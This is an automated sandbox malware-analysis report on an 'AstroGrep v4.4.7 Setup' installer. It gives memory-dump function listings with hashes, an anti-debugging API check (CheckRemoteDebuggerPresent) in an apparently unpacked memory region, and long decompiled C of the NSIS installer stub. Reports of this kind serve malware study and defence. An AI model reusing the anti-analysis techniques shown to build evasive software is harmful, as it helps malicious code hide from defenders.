                                                                                                            • Opcode ID: 3e8a3fdf9b7a80647ca6a8afb1253a4a9758c438bba494cb68c0476bdbc3fba0
                                                                                                            • Instruction ID: 73e56dc6ea9ec988fcd3362b418009c9999ff6fdc608374131b18cb56671e126
                                                                                                            • Opcode Fuzzy Hash: 3e8a3fdf9b7a80647ca6a8afb1253a4a9758c438bba494cb68c0476bdbc3fba0
                                                                                                            • Instruction Fuzzy Hash: B64148B1D006688FEB10CFA9D88579EBBF1FB48314F118129E814EB344D7B4A846CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F24D7C, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00F24E6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 27910b763d5690e6465f3de299dc7dae87e619ba8cb8bb04abf484ff50760496
                                                                                                            • Instruction ID: a4aa5d64383ffeab9d5704f9945f89a5d4c139b7c29bf79c2926c23b995594ae
                                                                                                            • Opcode Fuzzy Hash: 27910b763d5690e6465f3de299dc7dae87e619ba8cb8bb04abf484ff50760496
                                                                                                            • Instruction Fuzzy Hash: 57413BB1D006688FEB10CFA9D98579EBBF1FB48314F158529D814E7344D7B4A846CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F2D5D0, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00F2D64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: 38a6c153344acbc9631f67fd2c998204896d872f7b4ecd0fe48955806614dcb9
                                                                                                            • Instruction ID: 43f69301ed4c58a3ba4018a20b7e24207633f4cde82720bf7806e78cbb054e3a
                                                                                                            • Opcode Fuzzy Hash: 38a6c153344acbc9631f67fd2c998204896d872f7b4ecd0fe48955806614dcb9
                                                                                                            • Instruction Fuzzy Hash: C22164B1C042198FCB10CFAAD884BEEBBF4AF48324F15842AE459B3341C7789945CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00F27130, Relevance: .2, Instructions: 238COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.250543287.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2cc4ab3ee6b6e486d41d72810d67351c3556f780a3055d62a150bc6ccfe96785
                                                                                                            • Instruction ID: 715a66a46bc6cc5bc428e4f6a7066ef349cb9f1c4440c9337d217c759c056c56
                                                                                                            • Opcode Fuzzy Hash: 2cc4ab3ee6b6e486d41d72810d67351c3556f780a3055d62a150bc6ccfe96785
                                                                                                            • Instruction Fuzzy Hash: 4A916970E08319CFDF10EFA9D9817DEBBF2AF88314F148129E804A7294EB749845DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Analysis Process: ASTROGREP_SETUP_V4.4.7.EXE PID: 3728 Parent PID: 4156 ASTROGREP_SETUP_V4.4.7.EXECOMMON

                                                                                                            Executed Functions

                                                                                                            Function 0040310F, Relevance: 93.1, APIs: 34, Strings: 19, Instructions: 357stringcomfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			_entry_() {
				intOrPtr _t45;
				CHAR* _t49;
				char* _t52;
				CHAR* _t54;
				void* _t58;
				intOrPtr _t60;
				int _t61;
				int _t64;
				signed int _t65;
				int _t66;
				signed int _t68;
				void* _t92;
				signed int _t108;
				void* _t111;
				void* _t116;
				intOrPtr* _t117;
				char _t120;
				signed int _t139;
				signed int _t140;
				int _t148;
				void* _t149;
				intOrPtr* _t151;
				CHAR* _t154;
				CHAR* _t155;
				void* _t157;
				char* _t158;
				void* _t161;
				void* _t162;
				char _t184;

				 *(_t162 + 0x18) = 0;
				 *((intOrPtr*)(_t162 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t162 + 0x20) = 0;
				 *(_t162 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t117 = E004060C8(0);
					if(_t117 != 0) {
						 *_t117(0xc00);
					}
				}
				_t154 = "UXTHEME";
				do {
					E0040605A(_t154); // executed
					_t154 =  &(_t154[lstrlenA(_t154) + 1]);
				} while ( *_t154 != 0);
				E004060C8(9);
				_t45 = E004060C8(7);
				 *0x42e404 = _t45;
				__imp__#17(_t157);
				__imp__OleInitialize(0); // executed
				 *0x42e4b8 = _t45;
				SHGetFileInfoA(0x428828, 0, _t162 + 0x38, 0x160, 0); // executed
				E00405D2F("AstroGrep v4.4.7 Setup", "NSIS Error");
				_t49 = GetCommandLineA();
				_t158 = "\"C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE\" ";
				E00405D2F(_t158, _t49);
				 *0x42e400 = GetModuleHandleA(0);
				_t52 = _t158;
				if("\"C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE\" " == 0x22) {
					 *(_t162 + 0x14) = 0x22;
					_t52 =  &M00434001;
				}
				_t54 = CharNextA(E004057CC(_t52,  *(_t162 + 0x14)));
				 *(_t162 + 0x1c) = _t54;
				while(1) {
					_t120 =  *_t54;
					_t167 = _t120;
					if(_t120 == 0) {
						break;
					}
					__eflags = _t120 - 0x20;
					if(_t120 != 0x20) {
						L10:
						__eflags =  *_t54 - 0x22;
						 *(_t162 + 0x14) = 0x20;
						if( *_t54 == 0x22) {
							_t54 =  &(_t54[1]);
							__eflags = _t54;
							 *(_t162 + 0x14) = 0x22;
						}
						__eflags =  *_t54 - 0x2f;
						if( *_t54 != 0x2f) {
							L22:
							_t54 = E004057CC(_t54,  *(_t162 + 0x14));
							__eflags =  *_t54 - 0x22;
							if(__eflags == 0) {
								_t54 =  &(_t54[1]);
								__eflags = _t54;
							}
							continue;
						} else {
							_t54 =  &(_t54[1]);
							__eflags =  *_t54 - 0x53;
							if( *_t54 != 0x53) {
								L17:
								__eflags =  *_t54 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
								if( *_t54 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
									L21:
									__eflags =  *((intOrPtr*)(_t54 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t54 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
										 *((char*)(_t54 - 2)) = 0;
										__eflags =  &(_t54[2]);
										E00405D2F("C:\\Program Files (x86)\\AstroGrep",  &(_t54[2]));
										L27:
										_t155 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t155); // executed
										_t58 = E004030DE(_t167);
										_t168 = _t58;
										if(_t58 != 0) {
											L30:
											DeleteFileA("1033"); // executed
											_t60 = E00402C66(_t170,  *(_t162 + 0x20)); // executed
											 *((intOrPtr*)(_t162 + 0x10)) = _t60;
											if(_t60 != 0) {
												L40:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t180 =  *((intOrPtr*)(_t162 + 0x10));
												if( *((intOrPtr*)(_t162 + 0x10)) == 0) {
													__eflags =  *0x42e494;
													if( *0x42e494 == 0) {
														L64:
														_t61 =  *0x42e4ac;
														__eflags = _t61 - 0xffffffff;
														if(_t61 != 0xffffffff) {
															 *(_t162 + 0x14) = _t61;
														}
														ExitProcess( *(_t162 + 0x14));
													}
													_t64 = OpenProcessToken(GetCurrentProcess(), 0x28, _t162 + 0x18);
													__eflags = _t64;
													_t148 = 2;
													if(_t64 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t162 + 0x24);
														 *(_t162 + 0x38) = 1;
														 *(_t162 + 0x44) = _t148;
														AdjustTokenPrivileges( *(_t162 + 0x2c), 0, _t162 + 0x28, 0, 0, 0);
													}
													_t65 = E004060C8(4);
													__eflags = _t65;
													if(_t65 == 0) {
														L62:
														_t66 = ExitWindowsEx(_t148, 0x80040002);
														__eflags = _t66;
														if(_t66 != 0) {
															goto L64;
														}
														goto L63;
													} else {
														_t68 =  *_t65(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t68;
														if(_t68 == 0) {
															L63:
															E0040140B(9);
															goto L64;
														}
														goto L62;
													}
												}
												E00405525( *((intOrPtr*)(_t162 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42e41c == 0) {
												L39:
												 *0x42e4ac =  *0x42e4ac | 0xffffffff;
												 *(_t162 + 0x18) = E004036AF( *0x42e4ac);
												goto L40;
											}
											_t151 = E004057CC(_t158, 0);
											if(_t151 < _t158) {
												L36:
												_t177 = _t151 - _t158;
												 *((intOrPtr*)(_t162 + 0x10)) = "Error launching installer";
												if(_t151 < _t158) {
													_t149 = E004054A8(_t180);
													lstrcatA(_t155, "~nsu");
													if(_t149 != 0) {
														lstrcatA(_t155, "A");
													}
													lstrcatA(_t155, ".tmp");
													_t160 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
													if(lstrcmpiA(_t155, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
														_push(_t155);
														if(_t149 == 0) {
															E0040548B();
														} else {
															E0040540E();
														}
														SetCurrentDirectoryA(_t155);
														_t184 = "C:\\Program Files (x86)\\AstroGrep"; // 0x43
														if(_t184 == 0) {
															E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t160);
														}
														E00405D2F(0x42f000,  *(_t162 + 0x1c));
														_t135 = "A";
														_t161 = 0x1a;
														 *0x42f400 = "A";
														do {
															E00405D51(0, 0x428428, _t155, 0x428428,  *((intOrPtr*)( *0x42e410 + 0x120)));
															DeleteFileA(0x428428);
															if( *((intOrPtr*)(_t162 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE", 0x428428, 1) != 0) {
																E00405BEA(_t135, 0x428428, 0);
																E00405D51(0, 0x428428, _t155, 0x428428,  *((intOrPtr*)( *0x42e410 + 0x124)));
																_t92 = E004054C0(0x428428);
																if(_t92 != 0) {
																	CloseHandle(_t92);
																	 *((intOrPtr*)(_t162 + 0x10)) = 0;
																}
															}
															 *0x42f400 =  *0x42f400 + 1;
															_t161 = _t161 - 1;
														} while (_t161 != 0);
														E00405BEA(_t135, _t155, 0);
													}
													goto L40;
												}
												 *_t151 = 0;
												_t152 = _t151 + 4;
												if(E0040588F(_t177, _t151 + 4) == 0) {
													goto L40;
												}
												E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t152);
												E00405D2F("C:\\Program Files (x86)\\AstroGrep", _t152);
												 *((intOrPtr*)(_t162 + 0x10)) = 0;
												goto L39;
											}
											_t108 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
											while( *_t151 != _t108) {
												_t151 = _t151 - 1;
												if(_t151 >= _t158) {
													continue;
												}
												goto L36;
											}
											goto L36;
										}
										GetWindowsDirectoryA(_t155, 0x3fb);
										lstrcatA(_t155, "\\Temp");
										_t111 = E004030DE(_t168);
										_t169 = _t111;
										if(_t111 != 0) {
											goto L30;
										}
										GetTempPathA(0x3fc, _t155);
										lstrcatA(_t155, "Low");
										SetEnvironmentVariableA("TEMP", _t155);
										SetEnvironmentVariableA("TMP", _t155);
										_t116 = E004030DE(_t169);
										_t170 = _t116;
										if(_t116 == 0) {
											goto L40;
										}
										goto L30;
									}
									goto L22;
								}
								_t139 = _t54[4];
								__eflags = _t139 - 0x20;
								if(_t139 == 0x20) {
									L20:
									_t15 = _t162 + 0x20;
									 *_t15 =  *(_t162 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L21;
								}
								__eflags = _t139;
								if(_t139 != 0) {
									goto L21;
								}
								goto L20;
							}
							_t140 = _t54[1];
							__eflags = _t140 - 0x20;
							if(_t140 == 0x20) {
								L16:
								 *0x42e4a0 = 1;
								goto L17;
							}
							__eflags = _t140;
							if(_t140 != 0) {
								goto L17;
							}
							goto L16;
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t54 =  &(_t54[1]);
						__eflags =  *_t54 - 0x20;
					} while ( *_t54 == 0x20);
					goto L10;
				}
				goto L27;
			}
































                                                                                                            0x0040311f
                                                                                                            0x00403123
                                                                                                            0x0040312b
                                                                                                            0x0040312f
                                                                                                            0x00403134
                                                                                                            0x00403144
                                                                                                            0x00403147
                                                                                                            0x0040314e
                                                                                                            0x00403155
                                                                                                            0x00403155
                                                                                                            0x0040314e
                                                                                                            0x00403157
                                                                                                            0x0040315c
                                                                                                            0x0040315d
                                                                                                            0x00403169
                                                                                                            0x0040316d
                                                                                                            0x00403174
                                                                                                            0x0040317b
                                                                                                            0x00403180
                                                                                                            0x00403185
                                                                                                            0x0040318c
                                                                                                            0x00403192
                                                                                                            0x004031a8
                                                                                                            0x004031b8
                                                                                                            0x004031bd
                                                                                                            0x004031c3
                                                                                                            0x004031ca
                                                                                                            0x004031dd
                                                                                                            0x004031e2
                                                                                                            0x004031e4
                                                                                                            0x004031e6
                                                                                                            0x004031eb
                                                                                                            0x004031eb
                                                                                                            0x004031fb
                                                                                                            0x00403201
                                                                                                            0x004032ca
                                                                                                            0x004032ca
                                                                                                            0x004032cc
                                                                                                            0x004032ce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040320a
                                                                                                            0x0040320d
                                                                                                            0x00403215
                                                                                                            0x00403215
                                                                                                            0x00403218
                                                                                                            0x0040321d
                                                                                                            0x0040321f
                                                                                                            0x0040321f
                                                                                                            0x00403220
                                                                                                            0x00403220
                                                                                                            0x00403225
                                                                                                            0x00403228
                                                                                                            0x004032ba
                                                                                                            0x004032bf
                                                                                                            0x004032c4
                                                                                                            0x004032c7
                                                                                                            0x004032c9
                                                                                                            0x004032c9
                                                                                                            0x004032c9
                                                                                                            0x00000000
                                                                                                            0x0040322e
                                                                                                            0x0040322e
                                                                                                            0x0040322f
                                                                                                            0x00403232
                                                                                                            0x0040324a
                                                                                                            0x00403275
                                                                                                            0x00403277
                                                                                                            0x0040328a
                                                                                                            0x004032b5
                                                                                                            0x004032b8
                                                                                                            0x004032d6
                                                                                                            0x004032d9
                                                                                                            0x004032e2
                                                                                                            0x004032e7
                                                                                                            0x004032ed
                                                                                                            0x004032f8
                                                                                                            0x004032fa
                                                                                                            0x004032ff
                                                                                                            0x00403301
                                                                                                            0x00403359
                                                                                                            0x0040335e
                                                                                                            0x00403368
                                                                                                            0x0040336f
                                                                                                            0x00403373
                                                                                                            0x00403407
                                                                                                            0x00403407
                                                                                                            0x0040340c
                                                                                                            0x00403412
                                                                                                            0x00403417
                                                                                                            0x0040353b
                                                                                                            0x00403541
                                                                                                            0x004035bd
                                                                                                            0x004035bd
                                                                                                            0x004035c2
                                                                                                            0x004035c5
                                                                                                            0x004035c7
                                                                                                            0x004035c7
                                                                                                            0x004035cf
                                                                                                            0x004035cf
                                                                                                            0x00403551
                                                                                                            0x00403559
                                                                                                            0x0040355b
                                                                                                            0x0040355c
                                                                                                            0x00403569
                                                                                                            0x0040357c
                                                                                                            0x00403584
                                                                                                            0x00403588
                                                                                                            0x00403588
                                                                                                            0x00403590
                                                                                                            0x00403595
                                                                                                            0x0040359c
                                                                                                            0x004035aa
                                                                                                            0x004035ac
                                                                                                            0x004035b2
                                                                                                            0x004035b4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040359e
                                                                                                            0x004035a4
                                                                                                            0x004035a6
                                                                                                            0x004035a8
                                                                                                            0x004035b6
                                                                                                            0x004035b8
                                                                                                            0x00000000
                                                                                                            0x004035b8
                                                                                                            0x00000000
                                                                                                            0x004035a8
                                                                                                            0x0040359c
                                                                                                            0x00403426
                                                                                                            0x0040342d
                                                                                                            0x0040342d
                                                                                                            0x0040337f
                                                                                                            0x004033f7
                                                                                                            0x004033f7
                                                                                                            0x00403403
                                                                                                            0x00000000
                                                                                                            0x00403403
                                                                                                            0x00403388
                                                                                                            0x0040338c
                                                                                                            0x004033c2
                                                                                                            0x004033c2
                                                                                                            0x004033c4
                                                                                                            0x004033cc
                                                                                                            0x0040343e
                                                                                                            0x00403440
                                                                                                            0x00403447
                                                                                                            0x0040344f
                                                                                                            0x0040344f
                                                                                                            0x0040345a
                                                                                                            0x0040345f
                                                                                                            0x0040346e
                                                                                                            0x00403472
                                                                                                            0x00403473
                                                                                                            0x0040347c
                                                                                                            0x00403475
                                                                                                            0x00403475
                                                                                                            0x00403475
                                                                                                            0x00403482
                                                                                                            0x00403488
                                                                                                            0x0040348e
                                                                                                            0x00403496
                                                                                                            0x00403496
                                                                                                            0x004034a4
                                                                                                            0x004034a9
                                                                                                            0x004034bb
                                                                                                            0x004034c3
                                                                                                            0x004034c9
                                                                                                            0x004034d5
                                                                                                            0x004034db
                                                                                                            0x004034e5
                                                                                                            0x004034fb
                                                                                                            0x0040350c
                                                                                                            0x00403512
                                                                                                            0x00403519
                                                                                                            0x0040351c
                                                                                                            0x00403522
                                                                                                            0x00403522
                                                                                                            0x00403519
                                                                                                            0x00403526
                                                                                                            0x0040352c
                                                                                                            0x0040352c
                                                                                                            0x00403531
                                                                                                            0x00403531
                                                                                                            0x00000000
                                                                                                            0x0040346e
                                                                                                            0x004033ce
                                                                                                            0x004033d0
                                                                                                            0x004033db
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004033e3
                                                                                                            0x004033ee
                                                                                                            0x004033f3
                                                                                                            0x00000000
                                                                                                            0x004033f3
                                                                                                            0x004033b7
                                                                                                            0x004033b9
                                                                                                            0x004033bd
                                                                                                            0x004033c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004033c0
                                                                                                            0x00000000
                                                                                                            0x004033b9
                                                                                                            0x00403309
                                                                                                            0x00403315
                                                                                                            0x0040331a
                                                                                                            0x0040331f
                                                                                                            0x00403321
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403329
                                                                                                            0x00403331
                                                                                                            0x00403342
                                                                                                            0x0040334a
                                                                                                            0x0040334c
                                                                                                            0x00403351
                                                                                                            0x00403353
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403353
                                                                                                            0x00000000
                                                                                                            0x004032b8
                                                                                                            0x00403279
                                                                                                            0x0040327c
                                                                                                            0x0040327f
                                                                                                            0x00403285
                                                                                                            0x00403285
                                                                                                            0x00403285
                                                                                                            0x00403285
                                                                                                            0x00000000
                                                                                                            0x00403285
                                                                                                            0x00403281
                                                                                                            0x00403283
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403283
                                                                                                            0x00403234
                                                                                                            0x00403237
                                                                                                            0x0040323a
                                                                                                            0x00403240
                                                                                                            0x00403240
                                                                                                            0x00000000
                                                                                                            0x00403240
                                                                                                            0x0040323c
                                                                                                            0x0040323e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040323e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040320f
                                                                                                            0x0040320f
                                                                                                            0x0040320f
                                                                                                            0x00403210
                                                                                                            0x00403210
                                                                                                            0x00000000
                                                                                                            0x0040320f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                            • GetVersion.KERNEL32 ref: 0040313A
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                            • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                            • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                            • GetCommandLineA.KERNEL32(AstroGrep v4.4.7 Setup,NSIS Error), ref: 004031BD
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000000), ref: 004031D0
                                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000020), ref: 004031FB
                                                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                            • ExitProcess.KERNEL32(?), ref: 00403407
                                                                                                            • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                            • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                            • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                              • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                            • String ID: "$"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $.tmp$1033$AstroGrep v4.4.7 Setup$C:\Program Files (x86)\AstroGrep$C:\Program Files (x86)\AstroGrep$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3329125770-3767821768
                                                                                                            • Opcode ID: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                                                            • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                            • Opcode Fuzzy Hash: 8cf9f27780d4a9ffc016deafba261a7cdcbd07a9ed72e1522d1863b0730728e5
                                                                                                            • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405086, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E00405086(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42dbe4; // 0x40266
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040501A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						FindCloseChangeNotification(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405D51(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x429868;
								_v40 = 0xfff;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42dbcc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42e408, 8); // executed
							__eflags =  *0x42e48c - _t150;
							if( *0x42e48c == _t150) {
								_t113 =  *0x429040; // 0x6eafd4
								E00404F48( *((intOrPtr*)(_t113 + 0x34)), _t150); // executed
							}
							E00403EED(1);
							goto L25;
						}
						 *0x428c38 = 2;
						E00403EED(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F7B(_t157, _a12, _a16);
						}
						ShowWindow( *0x42dbd0, _t150);
						ShowWindow(_v8, 8);
						E00403F49(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42e410;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
